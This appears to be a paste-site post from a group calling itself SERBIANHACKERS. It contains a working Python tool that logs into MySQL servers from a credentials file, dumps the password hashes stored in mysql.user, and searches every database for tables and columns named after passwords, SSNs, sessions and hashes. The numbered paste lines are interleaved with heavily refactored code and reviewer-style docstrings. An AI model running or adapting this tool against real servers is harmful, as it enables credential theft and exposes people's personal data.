SERBIANHACKERS

SRBTOOL | SQL Searcher

Apr 14th, 2017
  1. #SRBAHCKERS
  2.  
  3. #!/usr/bin/env python3
  4.  
  5. # On Kali Linux get the pymysql library by installing python3-pymysql
  6. import pymysql
  7.  
  # User-editable settings.
  #
  # toi ("tables of interest") and coi ("columns of interest") are keyword
  # lists. Matching is by substring, so the single keyword 'auth' matches all
  # of: auth, authentication, authorization, user_auth, user_authentication.
  toi = [
      'auth',
      'user',
      'session',
  ]
  coi = [
      'pass',
      'ssn',
      'usr',
      'session',
      'hash',
  ]

  # Passed to pymysql.connect() as connect_timeout.
  connect_timeout = 10

  # One entry per line in the form host|user|pass|port. The file holds
  # plaintext database passwords, so restrict its permissions and keep it out
  # of version control.
  cred_file = 'mysql_creds.txt'
  19.  
  20.  
  21. # Should not need to edit anything below this line.
  def query(conn, sql):
      """Run one SQL statement on *conn* and return every row.

      Returns whatever ``cursor.fetchall()`` yields, or ``None`` when the
      statement fails for any reason. Failures are printed with a ``[-]``
      prefix and never propagate to the caller.
      """
      try:
          with conn.cursor() as cur:
              cur.execute(sql)
              return cur.fetchall()
      except Exception as err:
          # pymysql's OperationalError is an Exception subclass and was
          # reported with the same message, so one handler covers both.
          print('[-] {0}'.format(err))
          return None
  36.  
  37.  
  def connect(host, user, pwd, db=None, port=3306):
      """Open a PyMySQL connection, or return ``None`` if it cannot be opened.

      Args:
          host: Server name or address.
          user: Login name.
          pwd: Login password.
          db: Optional default database for the session.
          port: TCP port, 3306 unless overridden.

      Any failure is printed with a ``[-]`` prefix and swallowed, so callers
      must check the result for ``None`` before using it.
      """
      # NOTE(review): no TLS options are passed, so whether the session is
      # encrypted depends on PyMySQL and server defaults -- confirm before
      # using across an untrusted network.
      settings = {
          'host': host,
          'user': user,
          'password': pwd,
          'database': db,
          'port': port,
          'connect_timeout': connect_timeout,
      }
      try:
          return pymysql.connect(**settings)
      except Exception as err:
          # The original had a separate OperationalError handler that printed
          # the same text; formatting str(err) and err gives identical output.
          print('[-] {0}'.format(err))
          return None
  51.  
  52.  
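  def get_dbs(conn):
      """Return the database names reported by ``show databases``.

      Returns an empty list when *conn* is ``None`` or the statement fails.
      The connection is left open: closing it is the caller's job.
      """
      if conn is None:
          return []

      rows = query(conn, 'show databases')

      # The original had a conn.close() placed after both return statements,
      # where it could never execute. It is removed rather than made live so
      # that this helper does not start closing a connection it was handed.
      if rows is None:
          return []
      return [row[0] for row in rows]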
  66.  
  67.  
  def get_tables(conn):
      """Return the table names reported by ``show tables`` on *conn*.

      The statement runs against whichever database the connection has
      selected. An empty list is returned when *conn* is ``None`` or the
      statement fails.
      """
      if conn is None:
          return []

      rows = query(conn, 'show tables')
      return [] if rows is None else [row[0] for row in rows]
  79.  
  80.  
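  def get_columns(conn, db, table):
      """Return the column names of ``db.table``.

      Returns an empty list when *conn* is ``None`` or the statement fails.

      The database and table names come back from the server, not from this
      script, so they are treated as data: each is wrapped in backticks with
      embedded backticks doubled. Unquoted, a name containing a dash, a space
      or a reserved word produced a malformed statement and the table was
      silently skipped.
      """
      if conn is None:
          return []

      def quote(name):
          # MySQL identifier quoting: `name`, with ` escaped as ``.
          return '`{0}`'.format(str(name).replace('`', '``'))

      sql = 'show columns from {0}.{1}'.format(quote(db), quote(table))
      rows = query(conn, sql)
      if rows is None:
          return []
      return [row[0] for row in rows]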
  93.  
  94.  
  def get_db_creds(host, conn):
      """Return one ``host-Host-User:Password`` string per ``mysql.user`` row.

      *host* is the server label supplied by the caller; ``Host``, ``User``
      and ``Password`` are the columns read from ``mysql.user``. Any ``*``
      characters at either end of the stored password value are stripped.
      Returns an empty list when *conn* is ``None`` or the statement fails.

      Reading ``mysql.user`` needs SELECT on the ``mysql`` system schema. A
      login that can run this statement holds more privilege than an
      application account needs, which makes grants on that schema worth
      auditing.
      """
      if conn is None:
          return []

      rows = query(conn, 'select Host, User, Password from mysql.user')
      if rows is None:
          return []

      # NOTE(review): a NULL Password value arrives as None and .strip() would
      # raise AttributeError here, outside query()'s error handling.
      entries = []
      for acct_host, acct_user, acct_hash in rows:
          entries.append('{0}-{1}-{2}:{3}'.format(host, acct_host, acct_user,
                                                  acct_hash.strip('*')))
      return entries
  108.  
  109.  
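  def get_creds(filename):
      """Yield ``(host, user, pwd, port)`` tuples from a credentials file.

      Each non-empty line must have the form ``host|user|pass|port``; *port*
      is converted to ``int``. Blank lines are skipped, since a trailing
      empty line would otherwise fail the four-way unpack. A line with a
      different number of ``|`` separators (for example a password that
      itself contains ``|``) still raises ``ValueError``.

      The file is opened in a ``with`` block so the handle is released when
      the generator finishes or is closed, instead of staying open until
      garbage collection.
      """
      with open(filename) as handle:
          for raw in handle:
              entry = raw.strip('\r\n')
              if not entry:
                  continue
              host, user, pwd, port = entry.split('|')
              yield host, user, pwd, int(port)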
  115.  
  116.  
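  def interesting_table(host, db, table):
      """Record ``(host, db, table)`` when the table name contains a keyword.

      A table is recorded in the module-level ``of_interest`` list if any
      entry of ``toi`` is a substring of *table* (case-sensitive). The
      original appended once per matching keyword, so a name such as
      ``user_auth`` was listed twice in the report; it is now recorded once.
      """
      if any(keyword in table for keyword in toi):
          of_interest.append((host, db, table))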
  121.  
  122.  
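  def interesting_col(host, db, table, col):
      """Record ``(host, db, table, col)`` when the column name has a keyword.

      A column is recorded in the module-level ``of_interest`` list if any
      entry of ``coi`` is a substring of *col* (case-sensitive). The original
      appended once per matching keyword, so a name such as ``pass_hash``
      was listed twice in the report; it is now recorded once.
      """
      if any(keyword in col for keyword in coi):
          of_interest.append((host, db, table, col))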
  127.  
  128.  
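  def search_db(host, user, pwd, port):
      """Collect account rows and keyword-matching names from one server.

      Results go into the module-level ``db_creds`` and ``of_interest``
      lists; nothing is returned.

      Changes from the original:
        * ``connect()`` returns ``None`` on failure. The per-database
          connection was closed unconditionally, so one unreachable database
          ended the whole run with ``AttributeError``. Such a database is now
          skipped.
        * The first, server-level connection was never closed. It is now
          closed as soon as the account and database lists have been read.
        * If the server-level connection fails there is nothing to collect,
          so the function returns straight away.
      """
      server_conn = connect(host, user, pwd, port=port)
      if server_conn is None:
          return

      print('[*] Getting MySQL credentials.')
      try:
          db_creds.extend(get_db_creds(host, server_conn))
          dbs = get_dbs(server_conn)
      finally:
          server_conn.close()

      for db in dbs:
          print('[*] Searching database {0}'.format(db))
          db_conn = connect(host, user, pwd, port=port, db=db)
          if db_conn is None:
              # connect() has already printed the reason.
              continue

          try:
              for table in get_tables(db_conn):
                  interesting_table(host, db, table)

                  for col in get_columns(db_conn, db, table):
                      interesting_col(host, db, table, col)
          finally:
              db_conn.close()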
  149.  
  150.  
  151. #-----------------------------------------------------------------------------
  152. # Begin Main Program
  153. #-----------------------------------------------------------------------------
  # Shared result lists, filled in by search_db() and its helpers.
  db_creds = []
  of_interest = []

  for host, user, pwd, port in get_creds(cred_file):
      print('[*] Searching {0} on port {1}'.format(host, port))
      search_db(host, user, pwd, port)

  # Each finding is (host, db, table) or (host, db, table, col); everything
  # after the host is joined with '->'.
  finding_lines = []
  for finding in of_interest:
      finding_lines.append('{0}:{1}'.format(finding[0], '->'.join(finding[1:])))

  print()
  print('Interesting Tables and Columns')
  print('==============================')
  print('Server:Database->Table->Column')
  print('------------------------------')
  print('\n'.join(finding_lines))
  print()
  # This section writes password hashes to stdout: handle terminal
  # scrollback and any redirected output as sensitive data.
  print('MySQL Hashes')
  print('============')
  print('Server-Host-Username:Password')
  print('-----------------------------')
  print('\n'.join(db_creds))